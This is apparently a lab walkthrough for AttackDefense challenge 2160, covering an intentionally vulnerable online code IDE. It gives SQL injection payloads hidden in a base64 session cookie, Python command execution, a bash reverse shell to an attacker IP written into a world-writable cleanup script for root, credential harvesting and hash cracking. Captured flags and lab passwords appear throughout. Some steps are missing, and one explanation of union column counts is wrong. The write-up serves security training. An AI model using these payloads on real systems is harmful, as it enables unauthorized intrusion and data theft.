Walkthrough 2160
Walkthrough 2160
Walkthrough 2160
URL https://attackdefense.com/challengedetails?cid=2160
Important Note: This document illustrates all the important steps required to complete this lab.
This is by no means a comprehensive step-by-step solution for this exercise. This is only
provided as a reference to various commands needed to complete this exercise and for your
further research on this topic. Also, note that the IP addresses and domain names might be
different in your lab.
When the lab is launched, an Online Code IDE WebApp opens up in Firefox.
Launch BurpSuite:
Select Web Application Analysis > burpsuite from the application menu.
Once BurpSuite opens up, configure FoxyProxy to use Burp Suite profile:
Use the following credentials to perform SQLi and login to the webapp:
FLAG1: 2fb96bbc46ca18d07e0455acc706ea17
Session ID (sessid):
eyJhZG1pbiI6IDAsICJ1c2VyaWQiOiAxLCAiZW1haWwiOiAiamFja2llQGNvZGUtaWRlLmNvbSIs
ICJGTEFHMiI6ICJmYzIzNWVkZmU5MTliODBiNGU4N2E3ZWY4NTJmMWY0ZiJ9
Note: Do not forward the above response. It will be used in the next steps.
Command: echo
eyJhZG1pbiI6IDAsICJ1c2VyaWQiOiAxLCAiZW1haWwiOiAiamFja2llQGNvZGUtaWRlLmNvbSIs
ICJGTEFHMiI6ICJmYzIzNWVkZmU5MTliODBiNGU4N2E3ZWY4NTJmMWY0ZiJ9 | base64 -d
FLAG2: fc235edfe919b80b4e87a7ef852f1f4f
Notice that there is an admin attribute in the decoded session and it is set to 0.
FLAG4: 7fa644c02146cd735a772199f6c9b050
Python Code:
print("Hello World!")
It must be because the Session ID was tampered in the previous step (while setting the admin
attribute to 1).
Step 6: Logout of the webapp and login back using the same SQLi payload.
Click on the Logout button located on the top right of the webapp:
Python Code:
print("Hello World!")
Execute the above code.
Session ID:
eyJhZG1pbiI6IDAsICJ1c2VyaWQiOiAxLCAiZW1haWwiOiAiamFja2llQGNvZGUtaWRlLmNvbSIs
ICJGTEFHMiI6ICJmYzIzNWVkZmU5MTliODBiNGU4N2E3ZWY4NTJmMWY0ZiJ9
Decode the Session ID retrieved from the above request and set the admin attribute to true
(anything other than 0 is considered as true) and encode it back:
Commands:
echo
eyJhZG1pbiI6IDAsICJ1c2VyaWQiOiAxLCAiZW1haWwiOiAiamFja2llQGNvZGUtaWRlLmNvbSIs
ICJGTEFHMiI6ICJmYzIzNWVkZmU5MTliODBiNGU4N2E3ZWY4NTJmMWY0ZiJ9 | base64 -d
Since the backend is vulnerable to SQLi, trying Union-based SQLi payload to get the admin
attribute set (anything other than 0) by the backend:
Commands:
echo '{"admin": 1, "userid": 1, "email": "'"' union select 1,2,3" '#", "FLAG2":
"fc235edfe919b80b4e87a7ef852f1f4f"}'
echo '{"admin": 1, "userid": 1, "email": "'"' union select 1,2,3" '#", "FLAG2":
"fc235edfe919b80b4e87a7ef852f1f4f"}' | base64 -w0
Modified Session ID:
eyJhZG1pbiI6IDEsICJ1c2VyaWQiOiAxLCAiZW1haWwiOiAiJyB1bmlvbiBzZWxlY3QgMSwyLDM
gIyIsICJGTEFHMiI6ICJmYzIzNWVkZmU5MTliODBiNGU4N2E3ZWY4NTJmMWY0ZiJ9Cg==
The above Session ID didn’t work! It must be because the number of columns on the left and
right side of the union keyword must be different.
Modify the Union-based SQLi payload and increase the number of columns on the right side of
the union keyword:
Command: echo '{"admin": 1, "userid": 1, "email": "'"' union select 1,2,3,4" '#", "FLAG2":
"fc235edfe919b80b4e87a7ef852f1f4f"}' | base64 -w0
FLAG3: 9448a9de8df7ef9473c3d82729bff89b
Note: Turn off the Intercept Mode in BurpSuite for all the future requests.
Notice the response in the webapp as well (after the interception is turned off in BurpSuite).
Python Code:
import os
os.system("ls -al")
The above code uses the system function from the os module to run the command: "ls -al"
Check the IP address of the host machine (the Kali attacker machine):
Start a netcat listening:
Code:
import os
Note: Make sure to replace the IP address with the one you get in your lab instance.
Run the code and notice the terminal running the netcat listener:
Command: printenv
FLAG5: 4787bf9ab0f4b5f60a19b577e4d1a486
Check the processes:
Command: ps aux
This script cleans up files that are older than 1 minute and owned by the codebot user
(excluding the home directory files).
It is world-writable! This can be leveraged to gain a root shell on the target machine.
Modify the contents of the cleanup script to receive a shell session on the attacker machine:
Commands:
echo "bash -c 'bash -i >& /dev/tcp/192.183.31.2/8888 0>&1'" > /cleanup.sh
cat /cleanup.sh
Command: whoami
Commands:
cat /home/admin/FLAG7
cat /root/FLAG10
FLAG7: 59b0dc3b11be41bd31e3e20823bc3a45
FLAG10: e8288b0cc0a442b58260b96f72609c9d
Command: ps aux
Notice that mysql server is running on the target machine, as seen in the above output.
Commands:
python -c "import pty;pty.spawn('/bin/bash')"
[Press CTRL + Z]
stty raw -echo
fg
Step 16: Look for MySQL credentials from the backend API code.
Commands:
ls
ls pythonAPI/
grep -r -C4 mysql pythonAPI/
Notice that the code (DBAPI.py) contains the credentials used to connect to the MySQL server:
Username: michael
Password: 5up3r_53cur3_p4ssw0rd
Step 17: Connecting to the MySQL server using the credentials retrieved in the previous step.
Commands:
show databases;
use secret_flag_9686d1f73c3
show tables;
select * from flag;
FLAG9: 1f63300548823105d976aeb86a2ccdfe
Step 19: Retrieving the authentication string for the MySQL root user.
Use the following SQL query to get the username, host and authentication string of all the users
in the mysql.user table:
Save the authentication_string for the root user to a file (on the attacker machine, that is, Kali
GUI) and crack it using John The Ripper:
Commands:
echo '*6B5EDDE567F4F29018862811195DBD14B8ADDD2A' > hash.txt
john hash.txt
FLAG11 (Password of MySQL root user): 1234567890
References: